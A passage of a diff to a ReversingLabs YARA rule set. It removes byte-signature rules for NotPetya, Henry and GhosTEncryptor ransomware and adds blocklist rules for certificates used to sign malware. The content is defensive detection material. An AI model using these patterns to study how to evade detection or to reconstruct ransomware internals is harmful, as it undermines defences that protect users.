?? ?? 48 C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? 66 89 BD ?? ?? 00 00 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? - 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B D6 48 85 DB 48 0F 45 D3 48 8D 4D ?? E8 ?? ?? ?? ?? - 48 8B 3D ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0B - } - $find_files_p4 = { - 48 8B 01 48 8D 54 24 ?? FF 50 ?? 48 83 C3 ?? 48 3B 5F ?? 75 ?? 48 8D 05 ?? ?? ?? ?? - 48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? - 72 ?? 48 FF C2 48 8B 8D ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? - 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF - 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 BD ?? ?? ?? ?? 48 8D 4D - ?? E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8D 85 ?? - ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ?? ?? - ?? 45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 - 33 E4 4C 8B 7C 24 ?? 48 8D 95 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0 - } - $enum_shares = { - 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 33 D2 C7 44 24 ?? ?? ?? ?? - ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42 - ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? - 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54 - 24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 89 5C 24 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00 - ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ?? 48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ?? - 48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B 5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C - 8B C7 48 8D 54 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 5C 24 ?? 48 8B CF E8 ?? ?? ?? - ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? - ?? 48 83 C4 ?? C3 - } - $encrypt_files_p1 = { - 48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA - ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 8B 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 49 83 FE ?? 0F 84 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 - 8B CE FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B F8 48 85 C0 0F 84 ?? ?? - ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80 - A5 ?? ?? ?? ?? ?? 0F B6 8D ?? ?? ?? ?? 80 E1 ?? 80 C9 ?? 88 8D ?? ?? ?? ?? 4C 8D 85 - ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? - ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 8B C1 48 8D - 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? - ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48 - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 48 8B DE 45 33 C9 45 33 C0 48 8B D6 49 8B CE FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? - ?? 48 81 F9 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48 - } - $encrypt_files_p2 = { - 8B FA 48 C1 FF ?? 48 8B C7 48 C1 E8 ?? 48 03 F8 48 85 FF 0F 8E ?? ?? ?? ?? 48 89 74 - 24 ?? 4C 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 89 44 24 ?? 4D 8B CF 4D 8B C7 48 8D 95 ?? ?? ?? ?? 33 C9 E8 ?? ?? ?? - ?? 45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 89 74 24 ?? 4C 8D 8D ?? - ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? - 45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 83 EF ?? 0F 85 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 83 78 ?? ?? 0F 8C ?? - ?? ?? ?? 41 8B C6 48 8D 1C C5 ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B 0C 18 8B - 04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? - ?? 75 ?? 66 C7 05 ?? ?? 05 00 ?? ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 80 35 ?? ?? - ?? ?? ?? 80 35 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B - 0C 18 8B 04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? - ?? ?? ?? ?? 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="3e:39:c2:cc:c4:94:43:8b:b8:c2:56:0f" and 1466142876<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "66025c6e-5d85-5660-87f1-3094a536bbe2" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16582-L16598" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "86b06519858dce4b77cb870905297a1fd1c767053fd07c0b0469eb7fc3ba6b32" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and (( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($enum_shares)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Divisible Limited" and pe.signatures[i].serial=="6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" and 1507248000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Notpetya : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE { meta: - description = "Yara rule that detects NotPetya ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ea655048-4ef7-5dd7-872e-f1c2e38234cf" - date = "2020-07-15" - modified = "2020-07-15" + id = "b80b1832-6bfa-555b-8462-cd17f9e5e0e1" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.NotPetya.yara#L1-L73" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "328f0e527fee2145879ee13c003d375db832f7f3eacf7a1eb303393c1c8b5a36" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16600-L16616" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "87202c29867e6410d59c1e3b5ab09a24ebac5c68c61d7b932b91a91dcf3707e2" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "NotPetya" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_file = { - 8B EC 83 EC ?? 53 56 57 33 F6 56 56 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? - ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 89 - 75 ?? 39 75 ?? 7C ?? B8 ?? ?? ?? ?? 7F ?? 39 45 ?? 76 ?? 89 45 ?? 8B D8 56 53 56 6A - ?? 56 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? FF 75 ?? 56 56 6A ?? 50 FF 15 ?? ?? - ?? ?? 8B F8 3B FE 74 ?? 53 8D 45 ?? 50 8B 45 ?? 57 56 FF 75 ?? 56 FF 70 ?? FF 15 ?? - ?? ?? ?? 85 C0 74 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF - 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B C9 C2 ?? ?? 8B 45 ?? 89 45 ?? C1 - E8 ?? 8D 58 ?? C7 45 ?? ?? ?? ?? ?? C1 E3 ?? E9 - } - $main = { - 55 8B EC 8B 45 ?? 53 56 8B 35 ?? ?? ?? ?? 57 BF ?? ?? ?? ?? 57 6A ?? BB ?? ?? ?? ?? - 53 83 C0 ?? 6A ?? 50 FF D6 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 57 6A - ?? 6A ?? EB ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 6A ?? 53 8B 45 ?? 6A ?? 83 C0 ?? 50 FF D6 - 85 C0 74 ?? 8B 75 ?? 8B C6 E8 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? 56 E8 ?? ?? ?? ?? 56 - E8 ?? ?? ?? ?? FF 76 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? EB ?? 8B - 75 ?? 56 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 5D C2 - } - $encryption_loop = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 - 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? - ?? ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 8B 46 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ?? 66 8B 10 - 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 - D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 - ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 - C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? - 50 FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 - 24 ?? ?? 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? - FF D3 85 C0 75 ?? 8B 45 ?? 56 48 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8D - 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 31 83 C1 ?? 66 85 F6 75 ?? - 2B CA D1 F9 8D 4C 4C ?? 3B C1 74 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 74 ?? FF 75 - ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 5B 8B E5 5D C2 - } - $shutdown = { - 68 ?? ?? ?? ?? 8B CA 8B D0 0F B7 45 ?? 03 C2 33 D2 F7 F6 0F B7 75 ?? 8D 85 ?? ?? ?? - ?? 50 03 F1 8B FA FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? F6 05 ?? ?? ?? - ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 56 57 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 56 57 - 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ?? - ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 5F 5E 8B C3 5B C9 C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sivi Technology Limited" and pe.signatures[i].serial=="21:22:06:46:c6:39:d6:2c:16:99:2f:46" and 1466130984<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "9fa41321-9736-5e67-b561-005b6d893e3f" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16618-L16634" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "518a22e31432ee42e6aceb861815f7f9e84f2430b7fb3a78b498e45c584584ab" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and $encrypt_file and $main and $encryption_loop and $shutdown + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GIN-Konsalt" and pe.signatures[i].serial=="73:86:63:f2:c9:e4:ad:b3:ad:53:06:aa:5e:7c:c5:48" and 1498435200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Henry : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE { meta: - description = "Yara rule that detects Henry ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "63627f2b-3205-5790-ba97-8e0d1da39d7c" - date = "2021-06-14" - modified = "2021-06-14" + id = "559dc522-bc23-5716-b8ad-9e9df102936b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Henry.yara#L1-L80" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e6ab2a8a344d40407118e29ff78f5a0144f42a0fbdee19a80b341b59f056d292" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16636-L16652" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4cc8f00a9704f595f3e48375942a19cd6f8d6c0e53afc932a61f5a4326be4bcb" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Henry" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 02 6F ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? - ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 06 8E 69 32 ?? 02 6F ?? ?? ?? ?? 0D 16 0B 38 ?? ?? - ?? ?? 09 07 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? D4 8D - ?? ?? ?? ?? 13 ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 26 6F ?? ?? ?? ?? 11 ?? 6F ?? - ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 18 18 73 ?? ?? ?? ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ?? - ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 09 8E 69 3F ?? ?? - ?? ?? 2A - } - $encrypt_files = { - 02 8E 2D ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 03 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 - ?? ?? ?? ?? 7A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 28 ?? - ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 03 08 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 1F ?? 6F ?? ?? ?? - ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 25 02 16 02 8E 69 6F ?? ?? ?? - ?? 25 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? - 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 FE ?? 09 6F ?? ?? ?? ?? DC 06 2A - } - $setup_environment = { - 02 28 ?? ?? ?? ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 - ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 02 28 ?? ?? ?? ?? 2A - } - $init_components = { - 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 - 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19 - 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? - ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ?? - ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? - ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 - 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? - ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? - ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 22 ?? ?? ?? ?? 22 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 02 17 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ?? - ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 02 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 16 28 ?? ?? ?? ?? 02 28 ?? ?? - ?? ?? 2A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="42:80:f2:c8:ce:1d:98:e5:f8:da:7e:cb:00:5e:ea:e5" and 1476316800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "46bc3ade-544c-5ee1-8d5d-4b8a269120c9" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16654-L16670" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b7b4925482fcc47dea81eb3d84af31cc572f1b19080b98dda330b0bf6d7c80f4" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($setup_environment) and ($init_components) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="29:46:39:7b:e9:c5:ae:44:e9:5c:99:af" and 1476092708<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostencryptor : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE { meta: - description = "Yara rule that detects GhosTEncryptor ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9f035e39-e0fe-54f3-8206-08fbbd9206b4" - date = "2021-08-12" - modified = "2021-08-12" + id = "c3a18989-239e-56d7-b1c2-92895c02b7d8" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.GhosTEncryptor.yara#L1-L69" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "85c1f6e5acf746388b0a9ddeb1f0ad1d2219fff7358c9a981849863155c13e3c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16672-L16688" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b0c82388fd87a89841d190ce4020cc5a2ea21c9d765ceca6bc25d64162479231" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GhosTEncryptor" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $enum_folders = { - 17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 03 28 ?? ?? ?? ?? 0B 16 0C 38 ?? ?? ?? ?? - 07 08 9A 0D 02 09 28 ?? ?? ?? ?? 2C ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? - ?? ?? 